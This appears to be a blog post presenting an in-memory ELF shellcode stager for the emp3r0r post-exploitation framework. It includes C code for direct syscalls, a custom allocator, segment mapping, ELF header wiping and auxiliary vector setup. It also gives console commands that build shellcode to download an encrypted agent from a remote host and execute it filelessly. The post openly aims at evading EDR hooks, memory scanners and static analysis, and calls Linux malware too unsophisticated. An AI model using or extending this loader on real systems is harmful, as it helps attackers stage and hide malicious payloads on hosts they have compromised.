banner

TL;DR

The source code of this module is available in emp3r0r.

  1. Pure C Shellcode: I implemented a full ELF loader and network stack in C, using direct syscalls to avoid libc dependencies.
  2. True In-Memory: Uses mmap to manually map segments, avoiding memfd_create and disk I/O.
  3. Stealth: Randomizes ELF headers in memory immediately after loading to defeat signature scanning.
  4. Reliability: Implements a custom "Hello/ACK" reliability layer over UDP to ensure payload delivery on unstable networks.

Introducing sRDI for Linux

This is probably the first public implementation of a true "sRDI" equivalent for Linux.

The Linux version of sRDI (Shellcode Reflective ELF Injection) is a shellcode stager I designed to load and execute ELF binaries entirely from memory, bypassing the need for disk writes or standard system loaders.

It downloads an encrypted and compressed ELF binary over the network, decrypts and decompresses it in a user-land heap, and then manually maps and executes it. Crucially, I wrote the entire stager in C to ensure maintainability, yet it compiles down to position-independent shellcode that relies on no external libraries.

What is sRDI?

On Windows, sRDI (Shellcode Reflective DLL Injection) is a staple technique that converts a DLL into position-independent shellcode. This shellcode handles the complex task of loading the DLL from memory—allocating sections, processing relocations, and fixing imports—without ever touching the disk.

My Linux implementation mirrors this philosophy but adapts it to the ELF format. It acts as a lightweight, user-land kernel: it parses segments, maps them to virtual memory, sets up the execution environment (stack and auxiliary vectors), and transfers control.

Why sRDI for Linux?

Linux malware are significantly less advanced than their Windows counterparts. Defenders still look for outdated and easy-to-detect techniques like LD_PRELOAD, memfd_create, and ptrace injection, while advanced in-memory loading techniques are rarely seen in the wild.

To be fair, the reason for this is that most Linux distributions don't have a reliable user-mode ABI, although the kernel provides a stable syscall interface, the syscalls are too limited compared to Windows API, making it very challenging and tedious to implement basic features like encryption, networking, and memory management in pure shellcode.

I wrote this module to demonstrate that it is indeed possible to implement a fully functional sRDI loader for Linux, and to provide a foundation for future Linux in-memory loading techniques.

Key Features

  • True In-Memory Execution: Unlike techniques that rely on memfd_create (which still creates a file descriptor visible in /proc), my loader uses mmap to manually allocate memory and load the ELF segments. This mimics the kernel's binary loader but runs entirely in user space.
  • Diskless: The agent binary never touches the filesystem.
  • Header Randomization: I randomize the ELF header in memory immediately after loading. This neutralizes memory scanners that hunt for the \x7fELF magic bytes to identify injected binaries.
  • Direct Syscalls: The stager uses inline assembly to make direct system calls, removing dependencies on libc and completely bypassing user-land hooks (like LD_PRELOAD based EDRs).
  • String Obfuscation: Critical strings are XOR-encoded to evade static analysis.

Implementation Details

To achieve this, I had to solve several major engineering challenges: dependencies, memory management, and the loader logic itself.

Ditch libc, use Syscalls

If you rely on libc, your shellcode won't be portable, and you risk getting hooked by EDRs using LD_PRELOAD. I rewrote the necessary standard library functions (socket, connect, write, mmap) using inline assembly to make direct system calls.

For example, here is my wrapper for socket:

static inline long syscall3(long n, long a1, long a2, long a3) {
  unsigned long ret;
  __asm__ __volatile__("syscall"
                       : "=a"(ret)
                       : "a"(n), "D"(a1), "S"(a2), "d"(a3)
                       : "rcx", "r11", "memory");
  return ret;
}

int socket(int domain, int type, int protocol) {
  return (int)syscall3(SYS_socket, domain, type, protocol);
}

Manual Memory Management

Since I can't use malloc (it's part of libc), I implemented a stateless allocator using SYS_mmap (syscall 9). This allows the stager to manage heap memory for downloading, decrypting, and decompressing the payload dynamically.

void *malloc(size_t size) {
  size_t total_size = size + sizeof(size_t);
  // MAP_PRIVATE | MAP_ANONYMOUS
  long ret = syscall6(SYS_mmap, 0, total_size, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (ret < 0) return NULL;

  void *ptr = (void *)ret;
  *(size_t *)ptr = size; // Store size for free()
  return (uint8_t *)ptr + sizeof(size_t);
}

Mapping and Header Randomization

The core of the module is elf_loader.c. It mimics the kernel's binary loader but runs in userland. I iterate through the PT_LOAD segments of the ELF binary and map them into memory at the correct virtual addresses.

Crucially, to evade memory scanners that look for the \x7fELF header magic, I randomize the header immediately after mapping the first segment. This breaks the signature while keeping the segment valid for execution.

    // Map the segment
    void *m = (void *)mmap((void *)(base + map_start), map_size,
                           PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);

    // Copy segment data
    memcpy((void *)base + phdr[x].p_vaddr, elf_start + phdr[x].p_offset,
           phdr[x].p_filesz);

    // Wipe ELF header if it's in this segment using random bytes
    if (phdr[x].p_offset == 0) {
      size_t wipe_size = sizeof(Elf_Ehdr);
      if (hdr->e_phoff < wipe_size)
        wipe_size = hdr->e_phoff;
      _get_rand((char *)base + phdr[x].p_vaddr, wipe_size);
    }

Stack Setup & Auxiliary Vector

You can't just jump to the entry point. Modern binaries (especially those built with Go or glibc) expect the kernel to provide specific information in the Auxiliary Vector (Auxv) during startup. A naive loader that skips this will cause the payload to crash immediately.

I manually construct the process stack, specifically populating AT_RANDOM (required for stack canaries), AT_PHDR, and AT_ENTRY.

  // AT_RANDOM: Address of 16 random bytes (crucial for glibc security features)
  at[cnt].id = AT_RANDOM;
  at[cnt++].value = (size_t)rand_bytes;

  // AT_PHDR: Address of program headers
  at[cnt].id = AT_PHDR;
  at[cnt++].value = (size_t)(elf_base + hdr->e_phoff);

Constructor Execution

Before handing over control to main, a proper loader must execute the binary's constructors (functions marked with __attribute__((constructor)) or located in .init sections).

My loader parses the .init and .init_array sections and sequentially executes these functions. This ensures that the runtime environment of the payload is fully initialized.

  // Let's run the constructors
  Elf_Shdr *init = _get_section(".init", buf);
  Elf_Shdr *init_array = _get_section(".init_array", buf);

  if (init) {
    ptr = (int (*)(int, char **, char **))base + init->sh_addr;
    ptr(argc, argv, env);
  }

In Action

You can find this module in the emp3r0r console.

use shellcode_stager
set LISTENER_TYPE TCP
set DOWNLOAD_HOST 192.168.1.100
set DOWNLOAD_PORT 8080
set DOWNLOAD_KEY my_secret_key
run

This generates a position-independent shellcode blob. You can inject it into any process, and it will bootstrap itself, download your agent, and execute it memory-resident.


Comments

comments powered by Disqus